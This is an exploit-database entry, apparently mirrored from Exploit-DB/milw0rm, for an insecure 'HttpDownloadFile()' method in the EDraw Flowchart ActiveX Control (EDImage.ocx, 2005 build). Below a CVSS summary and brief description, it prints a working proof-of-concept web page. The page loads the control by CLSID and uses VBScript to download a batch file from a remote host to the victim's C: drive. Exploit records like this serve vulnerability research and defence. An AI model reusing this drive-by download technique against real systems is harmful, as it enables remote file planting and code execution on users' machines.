header-logo
Suggest Exploit
vendor:
EDraw Flowchart ActiveX Control
by:
shinnai
7.5
CVSS
HIGH
Insecure Method
284
CWE
Product Name: EDraw Flowchart ActiveX Control
Affected Version From: EDraw Flowchart ActiveX Control (EDImage.ocx) v. 2.0.2005.1104
Affected Version To: EDraw Flowchart ActiveX Control (EDImage.ocx) v. 2.0.2005.1104
Patch Exists: NO
Related CWE:
CPE: a:anydraw:edraw_flowchart_activex_control:2.0.2005.1104
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
2007

EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) “HttpDownloadFile()” Insecure Method

The vulnerability allows an attacker to download and execute arbitrary files on a targeted system using the 'HttpDownloadFile()' method in EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104). By convincing a user to open a specially crafted web page, an attacker can execute arbitrary code on the system with the privileges of the user.

Mitigation:

To mitigate this vulnerability, users should avoid opening untrusted web pages or clicking on unknown links.
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------------------------------
 <b>EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method</b>
 url: http://www.anydraw.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------

<object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   On Error Resume Next
     test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.bat", "c:\shinnai.bat"
     MsgBox("Exploit completed!")
  End Sub
</script>

</span></span>
</code></pre>

# milw0rm.com [2007-11-02]